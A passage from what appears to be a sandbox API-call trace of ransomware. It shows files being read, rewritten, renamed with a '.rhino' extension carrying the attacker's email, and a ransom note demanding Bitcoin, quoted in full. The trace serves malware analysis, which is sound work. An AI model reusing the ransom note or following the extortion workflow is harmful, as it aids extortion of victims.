(HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x73b650 [0085.639] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0085.639] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x73b8e0 [0085.639] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73b650 | out: hHeap=0x6d0000) returned 1 [0085.639] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x73ba28 [0085.639] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73b8e0 | out: hHeap=0x6d0000) returned 1 [0085.639] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x73bc10 [0085.639] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73ba28 | out: hHeap=0x6d0000) returned 1 [0085.639] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75ef78 [0085.639] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73bc10 | out: hHeap=0x6d0000) returned 1 [0085.639] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x73b8e0 [0085.639] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0085.639] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x75ef78 [0085.639] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73b8e0 | out: hHeap=0x6d0000) returned 1 [0085.639] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x75f8e0 [0085.639] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0085.639] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x7606f8 [0085.639] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f8e0 | out: hHeap=0x6d0000) returned 1 [0085.640] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x761c38 [0085.640] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7606f8 | out: hHeap=0x6d0000) returned 1 [0085.640] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x763c00 [0085.640] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x761c38 | out: hHeap=0x6d0000) returned 1 [0085.644] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x75ef78 [0085.645] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x763c00 | out: hHeap=0x6d0000) returned 1 [0085.645] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x7636c8 [0085.645] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0085.645] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x73c0b8 [0085.646] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7636c8 | out: hHeap=0x6d0000) returned 1 [0085.708] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x74c388 [0085.711] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0085.712] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x70a650 [0085.714] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74c388 | out: hHeap=0x6d0000) returned 1 [0085.714] WriteFile (in: hFile=0xec, lpBuffer=0x70a660*, nNumberOfBytesToWrite=0xf757, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x70a660*, lpNumberOfBytesWritten=0x2cfa04*=0xf757, lpOverlapped=0x0) returned 1 [0085.716] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a650 | out: hHeap=0x6d0000) returned 1 [0085.716] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xf757, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0085.716] CloseHandle (hObject=0xec) returned 1 [0085.721] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x72a920 [0085.721] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75d698 [0085.721] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0085.721] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1fGwisp8jCt.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\1fgwisp8jct.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1fGwisp8jCt.png.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\1fgwisp8jct.png.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0085.723] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75d698 | out: hHeap=0x6d0000) returned 1 [0085.723] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73b758 | out: hHeap=0x6d0000) returned 1 [0085.723] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bfe8 | out: hHeap=0x6d0000) returned 1 [0085.723] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0085.723] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x72a920 [0085.723] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x75ef78 [0085.723] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0085.723] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0085.724] lstrlenA (lpString="All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail:\n1)generalchin@countermail.com\n2)generalchin@smime.ninja (if you do not receive a response from the first mailbox)\n\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nFree decryption as guarantee\nBefore paying you can send us up to 1 files for free decryption.\nThe total size of files must be less than 500 Kb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\n") returned 676 [0085.724] WriteFile (in: hFile=0xec, lpBuffer=0xcb9dd0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x2cfa5c, lpOverlapped=0x0 | out: lpBuffer=0xcb9dd0*, lpNumberOfBytesWritten=0x2cfa5c*=0x2a4, lpOverlapped=0x0) returned 1 [0085.726] CloseHandle (hObject=0xec) returned 1 [0085.726] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0085.726] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5hhJT-UBVp.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\5hhjt-ubvp.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0085.727] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0xe3cc [0085.727] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xe4ec, nNumberOfBytesToLockHigh=0x0) returned 1 [0085.727] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.727] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0085.728] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.729] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0xe3cc, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0xe3cc, lpOverlapped=0x0) returned 1 [0085.729] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0085.729] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0085.729] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0085.729] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0085.730] GetLastError () returned 0x0 [0085.730] SetLastError (dwErrCode=0x0) [0085.730] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0085.730] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe3ef) returned 0x72bfe8 [0085.730] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0085.730] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x73a3e0 [0085.730] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x73a4e8 [0085.730] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73a3e0 | out: hHeap=0x6d0000) returned 1 [0085.730] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.730] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0085.730] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0085.730] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0085.730] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0085.730] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0085.730] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0085.731] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0085.731] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0085.731] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0085.731] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0085.731] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0085.731] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df0f8 [0085.731] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0085.731] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0085.731] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0085.731] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0085.731] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0085.731] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0085.731] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0085.731] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0085.731] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0085.731] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x72a920 [0085.731] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0085.731] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x73a3e0 [0085.731] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0085.731] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x73a670 [0085.731] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73a3e0 | out: hHeap=0x6d0000) returned 1 [0085.731] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x73a750 [0085.731] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73a670 | out: hHeap=0x6d0000) returned 1 [0085.731] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x73a898 [0085.731] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73a750 | out: hHeap=0x6d0000) returned 1 [0085.732] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x73aa80 [0085.732] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73a898 | out: hHeap=0x6d0000) returned 1 [0085.732] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x73ad50 [0085.732] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73aa80 | out: hHeap=0x6d0000) returned 1 [0085.732] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x73a670 [0085.732] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73ad50 | out: hHeap=0x6d0000) returned 1 [0085.732] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x73acb8 [0085.732] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73a670 | out: hHeap=0x6d0000) returned 1 [0085.732] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x75ef78 [0085.732] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73acb8 | out: hHeap=0x6d0000) returned 1 [0085.732] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x73a670 [0085.732] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0085.732] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x75ef78 [0085.732] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73a670 | out: hHeap=0x6d0000) returned 1 [0085.732] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x760f40 [0085.732] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0085.732] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x763ed8 [0085.732] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x760f40 | out: hHeap=0x6d0000) returned 1 [0085.735] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x74c388 [0085.735] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x763ed8 | out: hHeap=0x6d0000) returned 1 [0085.736] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x75ef78 [0085.736] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74c388 | out: hHeap=0x6d0000) returned 1 [0085.736] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x74c388 [0085.737] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0085.737] WriteFile (in: hFile=0xec, lpBuffer=0x74c3a0*, nNumberOfBytesToWrite=0xe4ec, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x74c3a0*, lpNumberOfBytesWritten=0x2cfa04*=0xe4ec, lpOverlapped=0x0) returned 1 [0085.738] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74c388 | out: hHeap=0x6d0000) returned 1 [0085.738] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xe4ec, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0085.738] CloseHandle (hObject=0xec) returned 1 [0085.739] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x72a920 [0085.739] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75d698 [0085.740] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0085.740] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5hhJT-UBVp.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\5hhjt-ubvp.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5hhJT-UBVp.avi.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\5hhjt-ubvp.avi.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0085.851] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75d698 | out: hHeap=0x6d0000) returned 1 [0085.851] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73a4e8 | out: hHeap=0x6d0000) returned 1 [0085.851] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bfe8 | out: hHeap=0x6d0000) returned 1 [0085.851] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x72a920 [0085.851] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0085.851] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0085.851] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x75ef78 [0085.851] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0085.851] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.851] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0085.851] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6V7X.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\6v7x.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0085.852] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x11c6d [0085.852] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x11d8d, nNumberOfBytesToLockHigh=0x0) returned 1 [0085.852] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.852] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0085.853] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.854] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x11c6d, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x11c6d, lpOverlapped=0x0) returned 1 [0085.855] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0085.855] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0085.855] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0085.855] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0085.855] GetLastError () returned 0x0 [0085.855] SetLastError (dwErrCode=0x0) [0085.855] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0085.855] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11c90) returned 0x70a650 [0085.859] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0085.859] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x75ef78 [0085.859] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x75f080 [0085.859] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0085.859] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.859] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0085.859] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0085.859] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0085.859] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0085.859] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0085.859] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0085.859] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0085.859] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0085.860] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0085.860] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df0f8 [0085.860] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0085.860] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0085.860] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0085.860] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0085.860] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0085.860] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0085.860] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0085.860] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0085.860] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0085.860] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0085.860] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0085.860] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0085.860] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0085.860] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x75ef78 [0085.860] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0085.860] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x75f208 [0085.860] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0085.860] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x75f2e8 [0085.861] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f208 | out: hHeap=0x6d0000) returned 1 [0085.861] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x75f430 [0085.861] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f2e8 | out: hHeap=0x6d0000) returned 1 [0085.861] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x75f618 [0085.861] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f430 | out: hHeap=0x6d0000) returned 1 [0085.861] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75f8e8 [0085.861] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f618 | out: hHeap=0x6d0000) returned 1 [0085.861] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x75f208 [0085.861] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f8e8 | out: hHeap=0x6d0000) returned 1 [0085.861] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x75f850 [0085.861] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f208 | out: hHeap=0x6d0000) returned 1 [0085.861] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x7601b8 [0085.861] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f850 | out: hHeap=0x6d0000) returned 1 [0085.861] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x760fd0 [0085.861] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7601b8 | out: hHeap=0x6d0000) returned 1 [0085.861] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x762510 [0085.861] HeapFree (in: 